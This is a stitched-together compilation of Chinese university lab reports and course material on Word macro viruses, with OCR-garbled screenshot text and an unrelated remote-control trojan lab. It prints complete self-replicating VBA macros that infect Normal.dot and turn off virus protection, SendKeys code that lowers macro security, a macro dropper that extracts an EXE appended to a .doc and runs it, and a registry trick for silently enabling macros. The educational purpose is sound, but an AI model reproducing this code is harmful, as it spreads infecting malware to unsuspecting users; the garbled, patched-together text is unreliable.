网络安全技术实训项目单--宏病毒制作(自我复制)

计算机病实验报告姓名: 学号: 老师: 日期:一.实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

二.实验内容1. macro virus 中的内容2•信安实验平台---> 计算机病毒篇----> 计算机宏病毒3.结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象三.实验环境1. macro virus硬件设备：局域网，终端PC机。

系统软件：Win dows系列操作系统支撑软件：Word 2003软件设置：关闭杀毒软；打开Word 2003,在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic 项目的访问.实验环境配置如下图所示：2. 计算机宏病毒硬件设备：部署 WIN2003系统的PC 机一台 软件工具：Ofice word2007受感染终端 被感染终端四.实验步骤及截图1.自我复制，感染word 公用模板和当前文档打开一个word 文档，然后按 Alt+F11调用宏编写窗口（工具 宏 Visual Basic宏编辑器），在左侧的 project — 'Microsoft Word对象 ThisDocument 中输入以上代码，保存，此时当前word 文档就含有宏病毒艺件0 垢IET 耳匿丑1 SiA ㈡ 帮式血 禺试帀 运厅宙 工鼻皿 处報柜佯⑷ U 口业辂护血h @1 J v \ 1叫 孑仆丿吒* 丫 V 讪行測》列11 "I 口Tbl kllKv-CUBMh 匚1共,41 UUl ；+ V ■« ■ H X* fr* jeel Qltcr « vizt -普 fr ■!■■£■! tSSB IJ zJ r iFi.ET J «□! i Y PS LE ］ Tin L D ! PUJI viil tl .引用Mimi iiJuih■«ih IlQEMrd 尸TI 11 :乱 Eg即卩昶勰“乩 巾承石遵:俺讥帝玄-P'i4Si SiT-BonaLFTai; i. = FalseJ UTE 在 TNialhib 闻 VBFuiccl ^-erTct-tRisU) Ga •映和航It LiusCk LCD) at = Foh*iglT*r 电］I JL L 匕 打矗tjjizl. •CodU'lij ：1」.屯 I if flu 吐mu —F 讥亶 Ftti s-1!« 71iBk H IT ! = ：-veD -cnrKTif "|fBProj*-i ：灯匚onj •曲trrtir fl ］匚让斗mfil 亡 Sad 11 Hi th H“tIf Lla-lO .D 0 Th«.hl 誤山JT 1l ，匚讥fflMfLr 加蛊 Iaju«r *J_3Ta« i. 1l Lharu 口 H壬#：弘b 诂亡gmJQ •■范0*If Ths^ccsTriLl 二 E .C < & LaaaKsfjJq. 2. Xmh Aiiuu->feij-il _lJp*iii l .l fi冃l v ：!■口FIT 気时利 ^rti vH" cin^ri*1 murEnd I f Erd 丹 thIhid^K "RisrciVs ru: M :血可切l 54：Tri^y LaJ" iixd Jut-只要下次打开这个word 文档，就会执行以上代码，并将自身复制到 Normal.dot （word 文档的公共模板）和当前文档的ThisDocument 中， 同时改变函数名（模板中为Docume nt_Close ,当前文档为Document_Opejn ，此时所有的word 文档打开和关闭时，都将运行以 上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用， 本例中只是简单的跳出一个提示框。

---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求：通过本实验的学习，大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。

二、实验基本原理：宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro，第二前缀是：Word、 Word97、 Excel、 Excel97（也许还有别的）其中之一。

凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀，格式是：Macro. Word97；凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀，格式是：Macro. Word；凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀，格式是：Macro. Excel97；凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀，格式是：Macro. Excel，依此类推。

该类病毒的公有特性是能感染 OFFICE系列文档，然后通过OFFICE 通用模板进行传播，如：1 / 5著名的美丽莎(Macro. Melissa) 。

一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材：PC 电脑一台四、实验内容或步骤：---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1．启动 Word，创建一个新文档。

实验七计算机宏病毒分析及清除实验一、实验目的⏹了解“宏病毒”机理；⏹掌握清除宏病毒的方法；⏹掌握采用“宏”和脚本语言进行编程的技术。

二、实验时数：2小时三、实验环境⏹Windows 2000/2003/XP或更高级别的Windows操作系统；⏹Office Word 2000/2003等字处理软件。

四、实验要求⏹演示宏的编写；⏹理解宏病毒的作用机制。

五、实验步骤：1．软件设置关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。

注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

2．自我复制功能演示打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏” “Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

完整代码如下：'Macro-1：Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseSet ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModuleSet host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 2, "Sub Document_Close()"If ThisDocument = NormalTemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub以上代码的基本执行流程如下：1)进行必要的自我保护:Application.DisplayStatusBar = FalseOptions.SaveNormalPrompt = False高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。

-- Word宏病毒制作，传播，防范EXE变DOC的方法其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:1)createfile 用于打开文件,该函数vb的声明如下:declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string,byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributesas long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下:declare function closehandle lib "kernel32" (byval hobject as long) as long3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下:declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoreadas long, lpnumberofbytesread as long, byval lpoverlapped as long) as long4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下:declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowriteas long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long5)setfileponiter移动文件指针,该函数vb的声明如下:declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byvallpdistancetomovehigh as long, byval dwmovemethod as long) as long6)下面是以上函数的参数声明public const generic_read as long = &h80000000public const generic_write as long = &h40000000public const file_share_read as long = 1public const file_share_write as long = 2public const create_new as long = 1public const create_always as long = 2public const open_existing as long = 3public const open_always as long = 4public const truncate_existing as long = 5public const invalid_handle_value as long = -1public const file_attribute_normal as long = &h80好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数和参数声明拷进去!再回到“thisdocument．的代码视图，选择document．nbspopen的事件，输入一下代码：private sub document．open()dim buffer(65536) as bytedim h, h2, j, i, k as longh = createfile(thisdocument．path & "/" & thisdocument．name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0)‘以share_read的方式打开自身的doc文件h2 = createfile("c:\\autoexec.exe", generic_write, 0, 0, create_always, 0, 0)‘新建一个exe文件准备存放读取出来的数据.if h = invalid_handle_value thenexit subend ifk = setfilepointer(h, 32768, nil, 0)‘把文件指针移动到doc文件与exe文件交界处.doi = readfile(h, buffer(0), 65536, j, 0)i = writefile(h2, buffer(0), j, j, 0)loop until j < 65536closehandle (h)closehandle (h2)shell "c:\\autoexec.exe"‘运行exe文件end sub这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存好的doc文件的文件大小,不一顶就是32768哦,大家注意!大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和这个doc文件同一个目录下.运行doc命令:copy /b xxxx.doc + xxxxx.exe newdoc.doc这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存在c:\\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键: hkey_current_user\\software\\microsoft\\office\\9.0\\word\\security 中的level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候word就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值变为0的时候会怎么样!!??对了!如果设为0的话,word里面就会显示安全度为高,但却能自动运行任何的宏!!是不是很夸张??和注册表编辑器的后门一样这都是ms的后门吧?如果要受害人的机器接受你的doc文件又能顺利运行,最重要就是把word的安全度在注册表中的值改为0,怎么改??方法太多了吧,单是ie的恶意代码能实现的都太多了,另外,如果网页上连接上是doc的话,ie也会自动下载该doc文件!危险的ms啊!!这个算不算漏洞我不敢说,但防范真的很难,除非一天到晚监视着注册表,或者不用word?太消极了吧,最重要的是小心防范,陌生人的东西千万不要收!包括非exe文件,我们现在发现了doc文件能隐藏exe文件，也会有人发现其他文件能隐藏exe,所以大家千万要小心。

无锡商业职业技术学院工商管理学院电子商务专业《网络安全》课程
实训报告
实训项目计算机病毒与windows安全
学生姓名胡燕婷
学号 124311mm 班级电商121班
实训时间 2012-2-20地点实训1B-306 机号 37
3.
四、实训总结
这次的实训很有意思，让我们认识到计算机病毒并不是很恐怖的，因为只要有一定的了解或者是防护措施就可以，计算机病毒检测软件和DEBUG程序进行人工检测，这些都可以帮助我们。

但是我们必须是了解这种病毒的特征和习性，做起来并不难，只要是不断尝试。

安全和病毒一直是相悖的，但是我们只要是肯多去了解，肯定也会觉得计算机的安全其实是都可以做到的。

评分：评阅人：日期。

Word宏病毒实验应用场景计算机病毒是一个程序，一段可执行码,对计算机的正常使用进行破坏，使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。

就像生物病毒一样，计算机病毒有独特的复制能力。

计算机病毒可以很快地蔓延，又常常难以根除。

它们能把自身附着在各种类型的文件上。

当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。

这种程序不是独立存在的，它隐蔽在其他可执行的程序之中，既有破坏性，又有传染性和潜伏性。

轻则影响机器运行速度，使机器不能正常运行；重则使机器处于瘫痪，会给用户带来不可估量的损失。

通常就把这种具有破坏作用的程序称为计算机病毒。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。

当你看到病毒载体似乎仅仅表现在文字和图像上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。

若是病毒并不寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

病毒往往会利用计算机操作系统的弱点进行传播，提高系统的安全性是防病毒的一个重要方面，但完美的系统是不存在的，过于强调提高系统的安全性将使系统多数时间用于病毒检查，系统失去了可用性、实用性和易用性，另一方面，信息保密的要求让人们在泄密和抓住病毒之间无法选择。

病毒与反病毒将作为一种技术对抗长期存在，两种技术都将随计算机技术的发展而得到长期的发展。

宏病毒是使用宏语言（VBA）编写的恶意程序，存在于字处理文档、电子数据表格、数据库等数据文件中，例如office 数据处理系统中运行，利用宏语言的功能将自己复制、繁殖到其他数据文档中。

宏分成两种：一种是在某个文档中包含的内嵌宏，如fileopen 宏；另一种是属于word 应用程序，所有打开文档公用的宏，如autoopen 宏。

Word 宏病毒一般都首先隐藏在一个指定的word 文档中，一旦打开了这个word 文档，宏病毒就被执行，宏病毒要做的第一件事情就是将自己copy 到全局宏的荡然区域，使得所有打开的文档都可以使用这个宏。

Word宏病毒实验【实验环境】Windows实验台所需工具：Word2021、Outloo2021【实验内容】动手实现Word宏病毒的代码编写，熟悉Word宏病毒的作用机制，然后对其进行查杀，掌握去除Word宏病毒的方法。

实验内容包括：(1)编写自己的宏病毒此处以例如1的代码为例；(2)对doc1进行病毒殖入；(3)观察实验效果；(4)进行病毒去除。

Word宏病毒实验【实验原理】宏病毒是使用宏语言VBA编写的恶意程序，存在于字处理文档、电子数据表格、数据库等数据文件中，例如office数据处理系统中运行，利用宏语言的功能将自己复制、繁殖到其它数据文档中。

宏分成两种：一种是在某个文档中包含的内嵌宏，如fileoents and Settings\Adiministrator\Aail附件进行传播，如梅丽莎病毒。

Word宏病毒实验【实验步骤】启动Windows实验台，进入Windows2021系统；双击桌面上的“病毒实验〞图标，进入病毒实验界面。

在界面上选择“Word宏病毒实验〞，进入其实施面板，如下图。

图实验进行前，要先点击“初始化病毒工具〞按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具〞按钮，对工具重新进行初始化，以便实验顺利进行。

一、使用例如1代码选择“例如1源码〞，在右侧病毒介绍框内查看例如1 的源码，如下图。

二、图对doc1进行病毒殖入(1)点击“启动doc1〞，翻开Word文档，在菜单下选择“工具|宏|平安性〞，设置Word平安性，如下图。

(2)图按下AltF11或者选择“工具|宏|Visual Basic 编辑器〞，如下图；翻开如下图的ent，将例如1的源代码复制到此。

(3)图图查看“Normal|ThisDocument〞，如下图Normal下的ThisDocument为空。

(4)图关闭doc1文档。

然后再点击面板中的“启动doc1〞，在doc1翻开的过程中，会出现如下图的提示框，例如代码1执行成功。

苏州市职业大学实习（实训）任务书名称：病毒防范与分析实训起讫时间：2013年1月1日〜2013年1月6日院系：计算机工程系班级：10网络安全（CIW）指导教师：周莉、肖长水系主任：李金祥实习（实训）目的和要求掌握以网络管理员或者是网络安全专业人员的身份，实现对常见病毒的分析和预防方法。

要求掌握以下主要技能：1. 掌握文件型病毒原理、发现方法、查杀技巧；2. 掌握宏病毒的感染方式、工作原理和查杀方法；3. 掌握脚本病毒的一般性工作原理、常见的感染方式；4. 掌握邮件型病毒的传播方式、工作原理、查杀方法；5. 掌握计算机蠕虫的定义、攻击原理，了解漏洞溢出原理养成良好的编程习惯；文件（巳潟谊⑥查看㈣收懑凶XRCO地址(囚 O C^&jpNL^AnWir-Lab^riisExp^iteYiru^tsxtlheiO.exe \____ >»■■■ui rI Labor Day Virus, axe图1-1 :感染前heiO.exe 的大小文件® 编辑⑥查馳收藏⑷工具①帮動⑹l b捷乗ir 文件夹| j x地址(R Q 匚:^ExpNI3^AntiVir-Lab\Vtij5Exp\Fileviru£ltext图1-2 :感染后hei0.exe 的大小（2）单击工具栏“ OllyDBG ”按钮启动ollyDbg1.10 ，单击文件菜单中的“打开”项，选择要 修复的hei0.exe 。

由于病毒修改了原程序的入口点，因此会有程序入口点超出代码范围的提示。

如图1-3所示：立件旧至春怕调就囚搞禅®选项£匚@H （w ）圄呵回列聖I 兰1亚]旦~岂厂邑厂聖1團网回亘H图1-3 :打开要修复的文件单击“确定”按钮继续，程序会停在病毒修改后的程序入口点（hei0.exe 的入口点为0x00403200）上，在代码中找到最后一个 jmp 指令处（病毒感染完成后将跳转回原程序），按F2设置断点，按F9运行，程序会在刚设置的 jmp 断点上中断，查看 EAX 寄存器的值（EAX=0x401000注意上面提到的断点，下面还会用到） ，按F7单步执行到下一条指令地址，点选鼠标右键，选择菜单中的“用ollyDump 脱壳调试进程”，选中重建输入表方式 1,方式2各脱壳一次，分别保存为1.exe 、2.exe 。

word宏病毒课程设计一、课程目标知识目标：1. 学生理解Word宏病毒的定义、特征及其工作原理；2. 学生掌握如何识别Word文档中可能存在的宏病毒；3. 学生了解基本的宏病毒防护措施及处理方法。

技能目标：1. 学生能够运用Word软件的相关功能，查看并理解文档宏代码；2. 学生能够操作Word软件进行宏病毒的简单查杀与预防；3. 学生通过案例分析，提高解决问题的能力和信息处理能力。

情感态度价值观目标：1. 培养学生对计算机病毒防范的意识，增强信息安全保护观念；2. 激发学生对计算机编程的兴趣，提高其探究精神和创新意识；3. 培养学生良好的网络道德观念，遵循法律法规，尊重他人劳动成果。

课程性质：本课程为信息技术课程，旨在帮助学生掌握宏病毒相关知识，提高信息安全意识和技能。

学生特点：六年级学生已具备一定的计算机操作能力，对新鲜事物充满好奇，但信息安全意识较弱。

教学要求：结合学生特点，注重实践操作，以案例分析为主线，引导学生主动探究，培养其解决问题的能力。

在教学过程中，关注学生的情感态度价值观培养，使其成为具备良好网络素养的新时代少年。

1. Word宏病毒基础知识：- 宏病毒定义与特征；- 宏病毒的工作原理；- 宏病毒的危害及传播途径。

2. Word宏病毒识别与防护：- Word文档宏的查看与编辑；- 宏病毒识别技巧；- 宏病毒防护策略；- 疑似宏病毒文档的处理方法。

3. 实践操作与案例分析：- 实际操作演示宏病毒的查杀与防护；- 分析典型宏病毒案例，提高防范意识；- 学生动手实践，查杀模拟宏病毒。

4. 信息安全意识培养：- 介绍信息安全法律法规；- 培养良好的网络道德观念；- 探讨网络安全的重要性。

教学内容依据课程目标，结合教材相关章节进行组织。

在教学过程中，循序渐进地引导学生掌握宏病毒相关知识，注重实践操作和案例分析，以提高学生的实际操作能力和解决问题的能力。

同时，关注学生信息安全意识的培养，使其在学习过程中形成良好的网络素养。

附录
《网络安全技术》实训报告
实训项目名称：远程控制工具的使用
姓名班级学号
任课教师
实训地点实习时间
一、实训目的
通过对PCShare远程控制工具的使用,来理解和掌握木马的工作原理和工作过程
二、实训内容
1.PCShare扫描器的下载安装;
2.PCshare的配置;
3.结果分析;
三、实训过程
1、启动PCShare.exe
2、利用命令提示符Ping其他电脑，找到与自己的电脑可以建立连接的
另一台电脑的ip地址。

3、进入PcShare主控界面，单击生成客户。

将生成的文件通过u盘传送
到目标电脑上，在目标电脑上双击该文件即可。

4、利用VNC远程控制时，也应该先ping，找到与自己的电脑可以建立
连接的另一台电脑的ip地址，进行连接。

5、打开VNC，输入目标电脑的ip地址，实现对目标电脑的远程控制。

四、实训结果分析
通过这次实训，简单的掌握了PcShare、VNC这两种远程控制工具的使用，PcShare采用了HTTP反向通信驱动隐藏端口等技术，达到系统级别的隐藏，这种远程控制的方式与灰鸽子木马等远程控制方法相似。

VNC 是远程进入操作系统进行控制。

五、实训成绩
学生互评成绩教师考评成绩
总成绩
教师签字日期。

XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一．实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二．实验原理WORD的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素：菜单、宏、格式(如备忘录)等。

模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像和格式编排都是类似的。

WORD提供了几种常见文档类型的模板，如备忘录、报告和商务信件。

你可以直接使用模板来创建新文档，或者加以修改，也可以创建自己的模板。

一般情况下，WORD自动将新文档基于缺省的公用模板NORMAL.DOT。

由此可以看出，模板在建立整个文档中起的作用是作为基类，文档继承模板的属性，包括宏、菜单、格式等。

另外，WORD还提供强大的宏功能。

宏是能组织到一起作为一个独立命令使用的一系列WORD命令，它能使日常工作变得更容易。

在WORD启动时，会自动加载NORMAL.DOT模板，以及它们所包含的宏。

您可以为宏指定特殊的名称，使其变为自动宏，以便在执行某一操作时，如：启动WORD或打开文档，就自动执行具有特殊命名的宏。

同其他宏一样，你可以将自动宏定义在一个共用模板上，也可以将其定义在一个特定模板上。

宏病毒主要寄生在以下3个宏中：AUTOOPEN、AUTONEW、AUTOCLOSE。

带病毒文档打开时，将病毒传染给NORMAL.DOT公用模板中，再由公用模板传染给所有其它正常的文档。

二．MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。

被感染的WORD文档打开时或关闭时会首先弹出一个对话框，对话框关闭后再将控制权转移给正常的WORD文档执行。

MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏（文档打开时执行）感染NORMAL.DOT，使用AUTOCLOSE自动宏感染其它文档。

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害，并通过实际操作和观察，探索有效的防范和清除策略。

二、实验环境1、操作系统：Windows 10 专业版2、办公软件：Microsoft Office 20193、杀毒软件：＿____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时，宏病毒会被自动激活，并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份，以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示，记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响，如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时，Office 软件弹出了宏安全警告，但仍可以选择启用宏。

一旦启用宏，病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改，格式变得混乱。

CPU 使用率短时间内飙升，系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒，并成功清除大部分感染，但仍有部分残留。

手动删除宏代码后，文档恢复正常，系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性，能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要，用户应保持较高的安全意识，不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用，但仍需不断更新病毒库和优化清除算法，以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

宏病毒实验报告201424010257 邹文敏一、实验目的通过运行计算机代码，更加深刻的理解计算机代码。

对计算机代码有一个初步的认识。

加深对宏病毒的感性认识，宏病毒是感染数据文件word,office等。

二、实验内容运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。

三、实验步骤实验一：●将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开●运行第一个实验Visual Basic →normal →Microsoft→the documentProject→microsoft word对象→the document复制如下代码：'APMPPrivate Sub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.VirusProtection = FalseOptions.SaveNormalPrompt = False '以上都是基本的自我隐藏措施MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then _Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With HostIf .Lines(1, 1) <> "'APMP" Then '判断感染标志.DeleteLines 1, .CountOfLines '删除目标文件所有代码.InsertLines 1, MyCode '向目标文档写入病毒代码If ThisDocument = NormalTemplate Then _ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd WithMsgBox "Basic class macro by jackie", vbOKOnly, "APMP"End Sub保存时注意保存为宏文件实验一运行截图：清除实验一中的内容只需要删除，the document 中的内容在保存即可。

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统：WINDOWS2000JDK版本：Java Standard Edition 1.4.0以上数据库：MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。